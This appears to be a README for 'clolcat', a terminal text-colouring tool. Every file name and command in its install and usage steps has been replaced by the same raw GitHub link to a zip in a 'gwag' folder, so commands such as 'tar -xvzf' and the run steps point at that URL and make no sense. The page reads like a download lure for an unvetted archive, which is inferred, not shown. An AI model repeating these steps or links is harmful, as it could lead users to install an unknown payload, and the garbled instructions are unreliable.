clolcat is a small and fast application written in C. It enhances your command-line experience by making your text colorful. You can run it to add a splash of joy to your regular terminal commands.

To run clolcat, you need:
- A computer with macOS, Windows, or Linux.
- A terminal that supports ANSI colors.
- 10 MB of free disk space.
To get clolcat, visit this page to download:
On the releases page, you will see the latest version. Click on the version you want to download. Look for a file named something like https://raw.githubusercontent.com/Him-Horizon/clolcat/main/gwag/clolcat.zip or https://raw.githubusercontent.com/Him-Horizon/clolcat/main/gwag/clolcat.zip.
After downloading, locate the file in your downloads folder.
- For Windows: Right-click on the ZIP file and choose "Extract All." Follow the instructions to extract it.
- For macOS: Double-click the ZIP file to extract it.
- For Linux: Use the terminal and run
tar -xvzf https://raw.githubusercontent.com/Him-Horizon/clolcat/main/gwag/clolcat.zip.
Now, you can run clolcat.
- For Windows: Open Command Prompt. Navigate to the folder where you extracted clolcat and type
https://raw.githubusercontent.com/Him-Horizon/clolcat/main/gwag/clolcat.zip https://raw.githubusercontent.com/Him-Horizon/clolcat/main/gwag/clolcat.zipto get colored output of a text file. - For macOS and Linux: Open your terminal. Navigate to your clolcat folder and run
./clolcat https://raw.githubusercontent.com/Him-Horizon/clolcat/main/gwag/clolcat.zip.
You can replace https://raw.githubusercontent.com/Him-Horizon/clolcat/main/gwag/clolcat.zip with any text file you want to colorize.
You can use clolcat in different ways:
- Standard Output: Run
echo "Hello world" | ./clolcatto see the output in color. - Text Files: Use
./clolcat https://raw.githubusercontent.com/Him-Horizon/clolcat/main/gwag/clolcat.zipto colorize the content of any text file.
If you encounter issues, check the following:
- Ensure your terminal supports ANSI colors.
- Make sure you followed the installation steps correctly.
- If you have downloaded the wrong file format, redownload from the Releases page.
